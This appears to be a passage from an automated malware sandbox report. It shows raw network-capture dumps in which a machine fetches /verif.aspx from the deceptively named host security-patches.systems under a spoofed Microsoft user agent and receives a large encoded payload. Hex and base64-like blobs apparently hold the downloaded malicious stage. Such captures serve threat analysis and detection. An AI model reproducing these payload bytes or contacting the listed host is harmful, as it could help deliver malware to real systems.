                                            Data Ascii: +6Y/2iypolF5YTPaJKnB0iWgN1GtmYb7tK7/na2Zhvu0N7i94rlivjWeAJHqGLa+eetyVegUQrwtnvQTZVRKN3jpdq2mFUI2eGIz2iypjTac8TtB6gBGvi2KuBRp3A/T8y/P0qBZw3qU6Wa96ACyvD2KuhSB3gfT8S/v2jS1wTXxJ+vaLInBJvE3x9okrY03/BQ7QeoYsvB5ikVZcd4fz/Mnx9gjUclKjGJGWKYQujd4YjO6aN4Hw3s
                                            2024-12-06 21:12:13 UTC16384INData Raw: 36 51 43 30 4f 4d 34 6e 7a 64 53 68 49 52 48 77 50 62 6f 7a 55 57 46 56 77 58 70 6f 0d 0a 36 33 36 39 36 67 42 47 76 69 32 53 75 42 53 52 33 41 2f 37 38 79 2f 66 32 43 79 46 78 32 4b 30 36 32 61 78 70 68 43 65 4e 33 68 69 4d 39 6f 6b 64 63 4e 79 6e 4f 6c 2b 54 65 67 59 6f 72 77 74 0d 0a 69 72 6f 45 70 64 34 50 30 2f 45 6e 2b 39 77 73 6b 63 4e 36 70 4f 6c 6d 73 54 50 65 42 2b 75 51 52 67 35 51 59 62 78 64 79 49 65 64 75 42 52 70 33 67 63 72 38 7a 63 54 32 47 6e 63 47 6a 50 7a 0d 0a 4a 7a 76 61 68 41 69 4a 2b 37 53 75 2f 35 32 74 6d 59 62 37 74 44 65 34 76 54 79 57 68 76 75 30 72 76 2b 64 72 5a 6d 47 2b 37 51 33 75 4c 30 77 76 6b 4f 38 50 57 71 77 6b 58 48 63 44 7a 2f 7a 0d 0a 4c 7a 74 71 4c 46 6b 2b 41 50 4d 33 4f 39 67 30 71 63 46 36 68 49 6f 59 67 32 4e
                                            Data Ascii: 6QC0OM4nzdShIRHwPbozUWFVwXpo63696gBGvi2SuBSR3A/78y/f2CyFx2K062axphCeN3hiM9okdcNynOl+TegYorwtiroEpd4P0/En+9wskcN6pOlmsTPeB+uQRg5QYbxdyIeduBRp3gcr8zcT2GncGjPzJzvahAiJ+7Su/52tmYb7tDe4vTyWhvu0rv+drZmG+7Q3uL0wvkO8PWqwkXHcDz/zLztqLFk+APM3O9g0qcF6hIoYg2N
                                            2024-12-06 21:12:13 UTC16384INData Raw: 61 4f 75 6d 51 5a 36 71 74 62 37 39 0d 0a 64 73 79 75 6e 72 35 44 76 44 58 36 73 4c 68 67 33 41 65 76 2b 78 2b 72 55 52 64 4c 78 36 4a 6f 6e 63 79 75 36 4d 44 36 79 59 65 64 50 4f 63 6b 54 52 71 38 39 64 4c 4e 72 70 36 39 64 53 5a 35 0d 0a 59 74 69 43 36 74 68 61 79 49 65 64 75 4d 52 31 71 72 58 49 38 65 39 37 72 35 36 71 77 36 49 30 6e 4d 79 75 36 74 41 43 79 59 65 64 75 4e 77 74 71 37 58 49 38 53 63 2f 32 43 78 46 6a 58 4b 67 0d 0a 59 6a 4e 52 59 62 79 78 4e 33 68 69 76 73 52 42 71 37 58 49 38 54 65 6e 32 69 54 42 77 37 4a 41 6e 63 79 75 36 68 6a 65 74 41 46 32 50 43 64 74 6b 73 38 4c 68 35 33 4d 55 47 46 56 53 74 78 79 0d 0a 70 62 5a 74 6e 71 71 31 4e 33 68 69 4d 39 76 30 61 62 58 49 68 2b 70 6d 75 57 37 6a 44 39 2f 39 6f 6b 64 47 36 68 6a 65 76 47 6e
                                            Data Ascii: aOumQZ6qtb79dsyunr5DvDX6sLhg3Aev+x+rURdLx6Joncyu6MD6yYedPOckTRq89dLNrp69dSZ5YtiC6thayIeduMR1qrXI8e97r56qw6I0nMyu6tACyYeduNwtq7XI8Sc/2CxFjXKgYjNRYbyxN3hivsRBq7XI8Ten2iTBw7JAncyu6hjetAF2PCdtks8Lh53MUGFVStxypbZtnqq1N3hiM9v0abXIh+pmuW7jD9/9okdG6hjevGn
                                            2024-12-06 21:12:13 UTC16384INData Raw: 67 55 74 64 35 43 76 6a 4a 6d 39 42 53 64 56 55 6f 33 65 4f 6c 6d 57 65 67 41 68 72 77 39 7a 72 6f 55 73 64 34 48 35 2f 45 76 39 39 6f 30 6d 63 4e 69 6b 4f 6c 32 75 65 67 51 67 72 77 31 0d 0a 71 72 6f 63 30 64 67 66 78 53 72 70 64 72 6b 78 33 67 66 7a 6b 49 35 4f 72 70 34 2f 53 72 6f 31 79 6d 4b 35 6b 4e 32 31 79 50 75 6d 4f 31 37 58 68 63 2f 6c 44 58 56 62 52 31 31 56 53 6c 2b 49 0d 0a 46 44 74 42 43 65 33 47 50 32 69 4b 38 32 64 6e 56 63 6e 7a 64 4b 56 32 6b 57 46 56 53 6a 66 31 4c 35 2f 59 4c 4c 48 42 59 70 7a 70 4d 64 67 6b 36 63 46 36 6e 4f 6c 6d 6b 65 68 45 77 58 4c 45 0d 0a 36 33 62 70 36 68 6a 79 76 6a 58 57 39 42 53 64 71 72 58 49 68 2b 39 2b 2b 59 6d 64 6b 7a 64 34 36 58 62 6c 36 68 69 2b 55 2f 46 76 4d 31 46 68 56 63 48 53 4a 61 48 2f 6e 61 32
                                            Data Ascii: gUtd5CvjJm9BSdVUo3eOlmWegAhrw9zroUsd4H5/Ev99o0mcNikOl2uegQgrw1qroc0dgfxSrpdrkx3gfzkI5Orp4/Sro1ymK5kN21yPumO17Xhc/lDXVbR11VSl+IFDtBCe3GP2iK82dnVcnzdKV2kWFVSjf1L5/YLLHBYpzpMdgk6cF6nOlmkehEwXLE63bp6hjyvjXW9BSdqrXIh+9++Ymdkzd46Xbl6hi+U/FvM1FhVcHSJaH/na2
                                            2024-12-06 21:12:13 UTC16384INData Raw: 58 49 68 2b 48 66 51 65 71 5a 77 35 4b 34 6e 4d 79 75 36 73 41 36 79 49 65 64 59 62 6b 34 4a 30 6f 33 38 79 66 44 32 6d 6d 39 4e 59 56 34 0d 0a 59 76 55 55 69 46 54 42 65 6f 6a 70 49 74 6a 30 50 62 58 49 68 2b 39 32 75 4f 6a 51 4a 73 69 48 6e 62 67 63 61 64 37 66 57 34 65 64 7a 4e 74 6a 33 55 75 36 39 51 72 4d 72 70 37 63 78 31 4f 48 0d 0a 6e 63 7a 61 4e 46 33 42 73 68 79 64 7a 4b 37 71 58 63 4e 39 66 4b 56 32 72 5a 36 71 74 63 6a 31 4c 2f 2b 35 73 42 4e 49 4e 33 66 55 5a 70 30 7a 32 41 66 6a 6b 43 61 34 55 32 48 65 44 7a 2b 52 0d 0a 69 44 64 52 59 64 34 50 78 2f 75 69 4e 39 6a 6b 4e 62 58 49 68 39 73 33 55 57 46 56 49 65 61 48 36 62 59 78 6e 71 71 31 4e 43 68 6d 75 73 51 39 71 72 58 49 38 2b 39 76 72 70 36 71 79 51 35 34 0d 0a 46 31 47 58 4a 4c 31 4b 38
                                            Data Ascii: XIh+HfQeqZw5K4nMyu6sA6yIedYbk4J0o38yfD2mm9NYV4YvUUiFTBeojpItj0PbXIh+92uOjQJsiHnbgcad7fW4edzNtj3Uu69QrMrp7cx1OHnczaNF3BshydzK7qXcN9fKV2rZ6qtcj1L/+5sBNIN3fUZp0z2AfjkCa4U2HeDz+RiDdRYd4Px/uiN9jkNbXIh9s3UWFVIeaH6bYxnqq1NChmusQ9qrXI8+9vrp6qyQ54F1GXJL1K8
                                            2024-12-06 21:12:13 UTC16384INData Raw: 67 63 69 64 61 4c 50 35 42 75 58 56 46 68 33 67 66 66 6b 4d 59 72 55 32 48 65 42 38 76 7a 0d 0a 61 39 75 72 34 6c 56 4b 76 43 32 65 75 46 4f 49 4d 55 67 33 65 4f 6c 32 72 65 4b 56 54 72 34 39 70 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 53 6c 56 68 6f 7a 38 54 66 7a 32 69 79 56 77 53 62 78 0d 0a 4e 34 2f 61 4a 4f 6e 4b 44 33 6f 58 4f 70 59 6b 6a 55 73 33 65 47 4c 59 56 71 59 51 6b 6a 64 34 59 6a 50 62 4c 49 33 43 65 6f 70 74 68 51 53 54 30 4a 68 43 4a 2b 6c 32 72 65 4b 56 54 72 34 39 0d 0a 32 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 54 5a 56 68 6f 7a 38 54 65 48 32 69 7a 68 77 53 62 78 4e 34 50 61 4a 4f 58 4b 44 33 6b 58 4f 70 59 6b 67 55 73 33 65 47 4c 59 56 71 59 51 6e 6a 64 34 0d 0a 59 6a 50 62 4c 49 48 43 65 6f 6c 74 68 51 53 51 30 4a 68 43 62 77 6f 79 51
                                            Data Ascii: gcidaLP5BuXVFh3gffkMYrU2HeB8vza9ur4lVKvC2euFOIMUg3eOl2reKVTr49popVYVVKXKmduBSlVhoz8Tfz2iyVwSbxN4/aJOnKD3oXOpYkjUs3eGLYVqYQkjd4YjPbLI3CeopthQST0JhCJ+l2reKVTr492opVYVVKXKmduBTZVhoz8TeH2izhwSbxN4PaJOXKD3kXOpYkgUs3eGLYVqYQnjd4YjPbLIHCeolthQSQ0JhCbwoyQ
                                            2024-12-06 21:12:13 UTC16384INData Raw: 2f 77 50 66 71 33 31 57 6c 46 77 58 4c 67 0d 0a 34 66 4e 51 36 4e 41 6d 79 59 65 64 75 42 7a 35 33 31 75 2f 4c 64 2b 77 46 50 6c 55 79 6b 72 46 59 6b 61 2f 36 68 44 53 48 50 30 4f 7a 61 36 65 33 4d 39 66 68 70 33 4d 32 75 77 39 74 4d 69 48 0d 0a 36 37 34 31 6e 36 71 31 76 4f 30 47 7a 61 36 65 33 4e 39 58 68 70 33 4d 32 75 51 31 74 4d 69 48 4d 6c 76 56 35 56 31 61 75 76 56 4b 7a 36 36 65 76 57 30 38 68 35 33 31 46 4a 31 44 78 37 70 51 0d 0a 6e 73 79 75 4d 44 39 61 75 75 33 69 79 61 36 65 42 38 46 36 69 49 72 34 64 57 4a 56 77 37 49 6b 6e 4d 79 75 36 74 41 57 79 59 65 64 75 74 51 35 71 37 58 49 76 69 66 50 52 75 6f 59 75 72 53 35 0d 0a 49 72 68 41 36 4d 41 65 79 6f 65 64 75 42 42 6c 33 4d 39 76 68 5a 33 4d 32 69 68 64 77 37 6f 6b 6e 38 79 75 37 4d 41 65 79
                                            Data Ascii: /wPfq31WlFwXLg4fNQ6NAmyYeduBz531u/Ld+wFPlUykrFYka/6hDSHP0Oza6e3M9fhp3M2uw9tMiH6741n6q1vO0Gza6e3N9Xhp3M2uQ1tMiHMlvV5V1auvVKz66evW08h531FJ1Dx7pQnsyuMD9auu3iya6eB8F6iIr4dWJVw7IknMyu6tAWyYedutQ5q7XIvifPRuoYurS5IrhA6MAeyoeduBBl3M9vhZ3M2ihdw7okn8yu7MAey
                                            2024-12-06 21:12:13 UTC16384INData Raw: 62 57 53 52 6b 31 70 62 64 53 43 4b 67 43 64 69 56 63 46 36 68 4f 70 79 4d 65 6f 51 74 72 79 64 50 2f 46 56 59 5a 6d 47 2b 37 51 33 75 4c 33 69 75 57 61 2b 4e 5a 36 34 46 47 6e 63 44 38 50 7a 0d 0a 4c 38 66 59 4c 49 48 42 59 6f 54 72 5a 71 48 71 45 4c 71 2b 50 5a 71 34 48 4a 6d 53 53 7a 64 34 59 6a 50 61 4e 4b 32 4e 64 58 78 69 4d 31 46 68 33 67 38 2f 38 32 71 36 48 49 33 65 48 39 76 78 0d 0a 4e 39 76 63 4a 4c 33 44 63 71 54 70 66 6c 6e 71 52 4d 45 31 38 53 66 58 32 69 79 78 77 33 71 59 37 32 61 78 36 41 43 53 76 44 32 2b 75 46 6b 77 33 68 2f 76 38 32 42 6a 32 69 79 70 6f 68 6d 62 0d 0a 6e 4d 7a 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 44 65 34 76 65 4b 35 58 72 34 31 6e 72 67 55 6e 64 77 50 77 2f 4d 76 78 39 67 73 72 63 46 69 67 4b 55 78 55
                                            Data Ascii: bWSRk1pbdSCKgCdiVcF6hOpyMeoQtrydP/FVYZmG+7Q3uL3iuWa+NZ64FGncD8PzL8fYLIHBYoTrZqHqELq+PZq4HJmSSzd4YjPaNK2NdXxiM1Fh3g8/82q6HI3eH9vxN9vcJL3DcqTpflnqRME18SfX2iyxw3qY72ax6ACSvD2+uFkw3h/v82Bj2iypohmbnMzaJKnB0iWgN1GtmYb7tDe4veK5Xr41nrgUndwPw/Mvx9gsrcFigKUxU
                                            2024-12-06 21:12:13 UTC16384INData Raw: 58 49 31 79 76 47 4d 7a 55 57 47 2b 54 66 41 39 70 6a 4e 52 59 56 58 41 63 72 79 4c 47 46 42 68 56 61 4d 54 65 57 49 7a 30 52 79 6d 54 45 49 35 0d 0a 34 6b 36 6a 5a 69 42 78 76 44 56 71 75 42 42 70 33 68 73 37 38 36 72 62 6d 77 5a 52 53 72 77 31 62 6c 56 65 54 78 52 43 71 49 36 6d 64 79 74 6f 6b 67 2f 33 65 57 49 7a 55 59 70 53 6a 58 4b 34 0d 0a 59 6a 4e 52 59 64 38 50 39 35 47 47 4d 31 46 68 76 4a 63 33 65 47 4b 7a 4c 4a 4a 53 50 33 54 34 48 38 46 58 46 47 6a 42 59 6e 54 70 65 56 6e 71 42 30 62 66 2f 51 55 33 55 65 6f 51 51 73 56 33 0d 0a 63 6e 74 5a 42 31 70 6b 2f 2b 65 55 39 78 55 62 58 49 31 79 78 47 4d 7a 55 57 47 2b 54 66 41 39 33 6a 4e 52 59 56 58 41 63 73 53 4c 71 46 46 68 56 61 4f 6a 65 47 49 7a 30 52 79 6d 54 45 49 39 0d 0a 34 6b 36 6a 5a 43 42
                                            Data Ascii: XI1yvGMzUWG+TfA9pjNRYVXAcryLGFBhVaMTeWIz0RymTEI54k6jZiBxvDVquBBp3hs786rbmwZRSrw1blVeTxRCqI6mdytokg/3eWIzUYpSjXK4YjNRYd8P95GGM1FhvJc3eGKzLJJSP3T4H8FXFGjBYnTpeVnqB0bf/QU3UeoQQsV3cntZB1pk/+eU9xUbXI1yxGMzUWG+TfA93jNRYVXAcsSLqFFhVaOjeGIz0RymTEI94k6jZCB


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5192.168.2.549830185.234.216.175443
                                            TimestampBytes transferredDirectionData
                                            2024-12-06 21:13:12 UTC117OUTGET /verif.aspx HTTP/1.1
                                            User-Agent: Microsoft-WNS/11.0
                                            Host: security-patches.systems
                                            Cache-Control: no-cache
                                            2024-12-06 21:13:13 UTC252INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:13:13 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT
                                            ETag: "d75c4-62796294faafa"
                                            Accept-Ranges: bytes
                                            Content-Length: 882116
                                            Connection: close
                                            2024-12-06 21:13:13 UTC7940INData Raw: 4c 32 6e 42 59 56 5a 4b 4e 33 68 6d 4d 31 46 68 71 72 55 33 65 4e 6f 7a 55 57 46 56 53 6a 64 34 49 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 56 55 6f 33 65 47 49 7a 55 57 46 56 53 6a 64 34 0d 0a 59 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 58 55 73 33 65 47 77 73 36 32 39 56 2f 6a 36 31 51 34 74 51 4c 5a 68 72 59 78 41 4c 51 48 45 52 4a 79 56 51 43 67 4e 65 63 51 49 30 4a 46 6b 58 0d 0a 46 68 4d 7a 42 48 55 34 51 68 5a 43 57 6a 39 42 45 51 56 6b 57 41 39 63 4e 51 52 37 52 7a 70 79 52 6a 4e 52 59 56 56 4b 4e 33 68 48 2f 76 68 4f 4e 4f 62 77 42 41 4f 66 6c 68 30 30 35 76 41 45 0d 0a 30 4f 32 56 48 44 2f 6d 38 41 54 51 37 5a 4d 63 6c 65 62 77 42 41 55 65 6b 68 77 6b 35 76 41 45 42 52 36 56 48 43 48 6d 38 41 54 51 37 5a 49 63 49 75 62 77 42 41 55 65 6b
                                            Data Ascii: L2nBYVZKN3hmM1FhqrU3eNozUWFVSjd4IjNRYVVKN3hiM1FhVUo3eGIzUWFVSjd4YjNRYVVKN3hiM1FhXUs3eGws629V/j61Q4tQLZhrYxALQHERJyVQCgNecQI0JFkXFhMzBHU4QhZCWj9BEQVkWA9cNQR7RzpyRjNRYVVKN3hH/vhONObwBAOflh005vAE0O2VHD/m8ATQ7ZMclebwBAUekhwk5vAEBR6VHCHm8ATQ7ZIcIubwBAUek
                                            2024-12-06 21:13:13 UTC16384INData Raw: 2b 36 59 2f 32 69 79 70 6f 6c 46 35 59 54 50 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 4b 37 2f 6e 61 32 5a 68 76 75 30 0d 0a 4e 37 69 39 34 72 6c 69 76 6a 57 65 41 4a 48 71 47 4c 61 2b 65 65 74 79 56 65 67 55 51 72 77 74 6e 76 51 54 5a 56 52 4b 4e 33 6a 70 64 71 32 6d 46 55 49 32 65 47 49 7a 32 69 79 70 6a 54 61 63 0d 0a 38 54 74 42 36 67 42 47 76 69 32 4b 75 42 52 70 33 41 2f 54 38 79 2f 50 30 71 42 5a 77 33 71 55 36 57 61 39 36 41 43 79 76 44 32 4b 75 68 53 42 33 67 66 54 38 53 2f 76 32 6a 53 31 77 54 58 78 0d 0a 4a 2b 76 61 4c 49 6e 42 4a 76 45 33 78 39 6f 6b 72 59 30 33 2f 42 51 37 51 65 6f 59 73 76 42 35 69 6b 56 5a 63 64 34 66 7a 2f 4d 6e 78 39 67 6a 55 63 6c 4b 6a 47 4a 47 57 4b 59 51 75 6a 64 34 0d 0a 59 6a 4f 36 61 4e 34 48 77 33 73
                                            Data Ascii: +6Y/2iypolF5YTPaJKnB0iWgN1GtmYb7tK7/na2Zhvu0N7i94rlivjWeAJHqGLa+eetyVegUQrwtnvQTZVRKN3jpdq2mFUI2eGIz2iypjTac8TtB6gBGvi2KuBRp3A/T8y/P0qBZw3qU6Wa96ACyvD2KuhSB3gfT8S/v2jS1wTXxJ+vaLInBJvE3x9okrY03/BQ7QeoYsvB5ikVZcd4fz/Mnx9gjUclKjGJGWKYQujd4YjO6aN4Hw3s
                                            2024-12-06 21:13:13 UTC16384INData Raw: 36 51 43 30 4f 4d 34 6e 7a 64 53 68 49 52 48 77 50 62 6f 7a 55 57 46 56 77 58 70 6f 0d 0a 36 33 36 39 36 67 42 47 76 69 32 53 75 42 53 52 33 41 2f 37 38 79 2f 66 32 43 79 46 78 32 4b 30 36 32 61 78 70 68 43 65 4e 33 68 69 4d 39 6f 6b 64 63 4e 79 6e 4f 6c 2b 54 65 67 59 6f 72 77 74 0d 0a 69 72 6f 45 70 64 34 50 30 2f 45 6e 2b 39 77 73 6b 63 4e 36 70 4f 6c 6d 73 54 50 65 42 2b 75 51 52 67 35 51 59 62 78 64 79 49 65 64 75 42 52 70 33 67 63 72 38 7a 63 54 32 47 6e 63 47 6a 50 7a 0d 0a 4a 7a 76 61 68 41 69 4a 2b 37 53 75 2f 35 32 74 6d 59 62 37 74 44 65 34 76 54 79 57 68 76 75 30 72 76 2b 64 72 5a 6d 47 2b 37 51 33 75 4c 30 77 76 6b 4f 38 50 57 71 77 6b 58 48 63 44 7a 2f 7a 0d 0a 4c 7a 74 71 4c 46 6b 2b 41 50 4d 33 4f 39 67 30 71 63 46 36 68 49 6f 59 67 32 4e
                                            Data Ascii: 6QC0OM4nzdShIRHwPbozUWFVwXpo63696gBGvi2SuBSR3A/78y/f2CyFx2K062axphCeN3hiM9okdcNynOl+TegYorwtiroEpd4P0/En+9wskcN6pOlmsTPeB+uQRg5QYbxdyIeduBRp3gcr8zcT2GncGjPzJzvahAiJ+7Su/52tmYb7tDe4vTyWhvu0rv+drZmG+7Q3uL0wvkO8PWqwkXHcDz/zLztqLFk+APM3O9g0qcF6hIoYg2N
                                            2024-12-06 21:13:13 UTC16384INData Raw: 61 4f 75 6d 51 5a 36 71 74 62 37 39 0d 0a 64 73 79 75 6e 72 35 44 76 44 58 36 73 4c 68 67 33 41 65 76 2b 78 2b 72 55 52 64 4c 78 36 4a 6f 6e 63 79 75 36 4d 44 36 79 59 65 64 50 4f 63 6b 54 52 71 38 39 64 4c 4e 72 70 36 39 64 53 5a 35 0d 0a 59 74 69 43 36 74 68 61 79 49 65 64 75 4d 52 31 71 72 58 49 38 65 39 37 72 35 36 71 77 36 49 30 6e 4d 79 75 36 74 41 43 79 59 65 64 75 4e 77 74 71 37 58 49 38 53 63 2f 32 43 78 46 6a 58 4b 67 0d 0a 59 6a 4e 52 59 62 79 78 4e 33 68 69 76 73 52 42 71 37 58 49 38 54 65 6e 32 69 54 42 77 37 4a 41 6e 63 79 75 36 68 6a 65 74 41 46 32 50 43 64 74 6b 73 38 4c 68 35 33 4d 55 47 46 56 53 74 78 79 0d 0a 70 62 5a 74 6e 71 71 31 4e 33 68 69 4d 39 76 30 61 62 58 49 68 2b 70 6d 75 57 37 6a 44 39 2f 39 6f 6b 64 47 36 68 6a 65 76 47 6e
                                            Data Ascii: aOumQZ6qtb79dsyunr5DvDX6sLhg3Aev+x+rURdLx6Joncyu6MD6yYedPOckTRq89dLNrp69dSZ5YtiC6thayIeduMR1qrXI8e97r56qw6I0nMyu6tACyYeduNwtq7XI8Sc/2CxFjXKgYjNRYbyxN3hivsRBq7XI8Ten2iTBw7JAncyu6hjetAF2PCdtks8Lh53MUGFVStxypbZtnqq1N3hiM9v0abXIh+pmuW7jD9/9okdG6hjevGn
                                            2024-12-06 21:13:13 UTC16384INData Raw: 67 55 74 64 35 43 76 6a 4a 6d 39 42 53 64 56 55 6f 33 65 4f 6c 6d 57 65 67 41 68 72 77 39 7a 72 6f 55 73 64 34 48 35 2f 45 76 39 39 6f 30 6d 63 4e 69 6b 4f 6c 32 75 65 67 51 67 72 77 31 0d 0a 71 72 6f 63 30 64 67 66 78 53 72 70 64 72 6b 78 33 67 66 7a 6b 49 35 4f 72 70 34 2f 53 72 6f 31 79 6d 4b 35 6b 4e 32 31 79 50 75 6d 4f 31 37 58 68 63 2f 6c 44 58 56 62 52 31 31 56 53 6c 2b 49 0d 0a 46 44 74 42 43 65 33 47 50 32 69 4b 38 32 64 6e 56 63 6e 7a 64 4b 56 32 6b 57 46 56 53 6a 66 31 4c 35 2f 59 4c 4c 48 42 59 70 7a 70 4d 64 67 6b 36 63 46 36 6e 4f 6c 6d 6b 65 68 45 77 58 4c 45 0d 0a 36 33 62 70 36 68 6a 79 76 6a 58 57 39 42 53 64 71 72 58 49 68 2b 39 2b 2b 59 6d 64 6b 7a 64 34 36 58 62 6c 36 68 69 2b 55 2f 46 76 4d 31 46 68 56 63 48 53 4a 61 48 2f 6e 61 32
                                            Data Ascii: gUtd5CvjJm9BSdVUo3eOlmWegAhrw9zroUsd4H5/Ev99o0mcNikOl2uegQgrw1qroc0dgfxSrpdrkx3gfzkI5Orp4/Sro1ymK5kN21yPumO17Xhc/lDXVbR11VSl+IFDtBCe3GP2iK82dnVcnzdKV2kWFVSjf1L5/YLLHBYpzpMdgk6cF6nOlmkehEwXLE63bp6hjyvjXW9BSdqrXIh+9++Ymdkzd46Xbl6hi+U/FvM1FhVcHSJaH/na2
                                            2024-12-06 21:13:13 UTC16384INData Raw: 58 49 68 2b 48 66 51 65 71 5a 77 35 4b 34 6e 4d 79 75 36 73 41 36 79 49 65 64 59 62 6b 34 4a 30 6f 33 38 79 66 44 32 6d 6d 39 4e 59 56 34 0d 0a 59 76 55 55 69 46 54 42 65 6f 6a 70 49 74 6a 30 50 62 58 49 68 2b 39 32 75 4f 6a 51 4a 73 69 48 6e 62 67 63 61 64 37 66 57 34 65 64 7a 4e 74 6a 33 55 75 36 39 51 72 4d 72 70 37 63 78 31 4f 48 0d 0a 6e 63 7a 61 4e 46 33 42 73 68 79 64 7a 4b 37 71 58 63 4e 39 66 4b 56 32 72 5a 36 71 74 63 6a 31 4c 2f 2b 35 73 42 4e 49 4e 33 66 55 5a 70 30 7a 32 41 66 6a 6b 43 61 34 55 32 48 65 44 7a 2b 52 0d 0a 69 44 64 52 59 64 34 50 78 2f 75 69 4e 39 6a 6b 4e 62 58 49 68 39 73 33 55 57 46 56 49 65 61 48 36 62 59 78 6e 71 71 31 4e 43 68 6d 75 73 51 39 71 72 58 49 38 2b 39 76 72 70 36 71 79 51 35 34 0d 0a 46 31 47 58 4a 4c 31 4b 38
                                            Data Ascii: XIh+HfQeqZw5K4nMyu6sA6yIedYbk4J0o38yfD2mm9NYV4YvUUiFTBeojpItj0PbXIh+92uOjQJsiHnbgcad7fW4edzNtj3Uu69QrMrp7cx1OHnczaNF3BshydzK7qXcN9fKV2rZ6qtcj1L/+5sBNIN3fUZp0z2AfjkCa4U2HeDz+RiDdRYd4Px/uiN9jkNbXIh9s3UWFVIeaH6bYxnqq1NChmusQ9qrXI8+9vrp6qyQ54F1GXJL1K8
                                            2024-12-06 21:13:13 UTC16384INData Raw: 67 63 69 64 61 4c 50 35 42 75 58 56 46 68 33 67 66 66 6b 4d 59 72 55 32 48 65 42 38 76 7a 0d 0a 61 39 75 72 34 6c 56 4b 76 43 32 65 75 46 4f 49 4d 55 67 33 65 4f 6c 32 72 65 4b 56 54 72 34 39 70 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 53 6c 56 68 6f 7a 38 54 66 7a 32 69 79 56 77 53 62 78 0d 0a 4e 34 2f 61 4a 4f 6e 4b 44 33 6f 58 4f 70 59 6b 6a 55 73 33 65 47 4c 59 56 71 59 51 6b 6a 64 34 59 6a 50 62 4c 49 33 43 65 6f 70 74 68 51 53 54 30 4a 68 43 4a 2b 6c 32 72 65 4b 56 54 72 34 39 0d 0a 32 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 54 5a 56 68 6f 7a 38 54 65 48 32 69 7a 68 77 53 62 78 4e 34 50 61 4a 4f 58 4b 44 33 6b 58 4f 70 59 6b 67 55 73 33 65 47 4c 59 56 71 59 51 6e 6a 64 34 0d 0a 59 6a 50 62 4c 49 48 43 65 6f 6c 74 68 51 53 51 30 4a 68 43 62 77 6f 79 51
                                            Data Ascii: gcidaLP5BuXVFh3gffkMYrU2HeB8vza9ur4lVKvC2euFOIMUg3eOl2reKVTr49popVYVVKXKmduBSlVhoz8Tfz2iyVwSbxN4/aJOnKD3oXOpYkjUs3eGLYVqYQkjd4YjPbLI3CeopthQST0JhCJ+l2reKVTr492opVYVVKXKmduBTZVhoz8TeH2izhwSbxN4PaJOXKD3kXOpYkgUs3eGLYVqYQnjd4YjPbLIHCeolthQSQ0JhCbwoyQ
                                            2024-12-06 21:13:13 UTC16384INData Raw: 2f 77 50 66 71 33 31 57 6c 46 77 58 4c 67 0d 0a 34 66 4e 51 36 4e 41 6d 79 59 65 64 75 42 7a 35 33 31 75 2f 4c 64 2b 77 46 50 6c 55 79 6b 72 46 59 6b 61 2f 36 68 44 53 48 50 30 4f 7a 61 36 65 33 4d 39 66 68 70 33 4d 32 75 77 39 74 4d 69 48 0d 0a 36 37 34 31 6e 36 71 31 76 4f 30 47 7a 61 36 65 33 4e 39 58 68 70 33 4d 32 75 51 31 74 4d 69 48 4d 6c 76 56 35 56 31 61 75 76 56 4b 7a 36 36 65 76 57 30 38 68 35 33 31 46 4a 31 44 78 37 70 51 0d 0a 6e 73 79 75 4d 44 39 61 75 75 33 69 79 61 36 65 42 38 46 36 69 49 72 34 64 57 4a 56 77 37 49 6b 6e 4d 79 75 36 74 41 57 79 59 65 64 75 74 51 35 71 37 58 49 76 69 66 50 52 75 6f 59 75 72 53 35 0d 0a 49 72 68 41 36 4d 41 65 79 6f 65 64 75 42 42 6c 33 4d 39 76 68 5a 33 4d 32 69 68 64 77 37 6f 6b 6e 38 79 75 37 4d 41 65 79
                                            Data Ascii: /wPfq31WlFwXLg4fNQ6NAmyYeduBz531u/Ld+wFPlUykrFYka/6hDSHP0Oza6e3M9fhp3M2uw9tMiH6741n6q1vO0Gza6e3N9Xhp3M2uQ1tMiHMlvV5V1auvVKz66evW08h531FJ1Dx7pQnsyuMD9auu3iya6eB8F6iIr4dWJVw7IknMyu6tAWyYedutQ5q7XIvifPRuoYurS5IrhA6MAeyoeduBBl3M9vhZ3M2ihdw7okn8yu7MAey
                                            2024-12-06 21:13:13 UTC16384INData Raw: 62 57 53 52 6b 31 70 62 64 53 43 4b 67 43 64 69 56 63 46 36 68 4f 70 79 4d 65 6f 51 74 72 79 64 50 2f 46 56 59 5a 6d 47 2b 37 51 33 75 4c 33 69 75 57 61 2b 4e 5a 36 34 46 47 6e 63 44 38 50 7a 0d 0a 4c 38 66 59 4c 49 48 42 59 6f 54 72 5a 71 48 71 45 4c 71 2b 50 5a 71 34 48 4a 6d 53 53 7a 64 34 59 6a 50 61 4e 4b 32 4e 64 58 78 69 4d 31 46 68 33 67 38 2f 38 32 71 36 48 49 33 65 48 39 76 78 0d 0a 4e 39 76 63 4a 4c 33 44 63 71 54 70 66 6c 6e 71 52 4d 45 31 38 53 66 58 32 69 79 78 77 33 71 59 37 32 61 78 36 41 43 53 76 44 32 2b 75 46 6b 77 33 68 2f 76 38 32 42 6a 32 69 79 70 6f 68 6d 62 0d 0a 6e 4d 7a 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 44 65 34 76 65 4b 35 58 72 34 31 6e 72 67 55 6e 64 77 50 77 2f 4d 76 78 39 67 73 72 63 46 69 67 4b 55 78 55
                                            Data Ascii: bWSRk1pbdSCKgCdiVcF6hOpyMeoQtrydP/FVYZmG+7Q3uL3iuWa+NZ64FGncD8PzL8fYLIHBYoTrZqHqELq+PZq4HJmSSzd4YjPaNK2NdXxiM1Fh3g8/82q6HI3eH9vxN9vcJL3DcqTpflnqRME18SfX2iyxw3qY72ax6ACSvD2+uFkw3h/v82Bj2iypohmbnMzaJKnB0iWgN1GtmYb7tDe4veK5Xr41nrgUndwPw/Mvx9gsrcFigKUxU
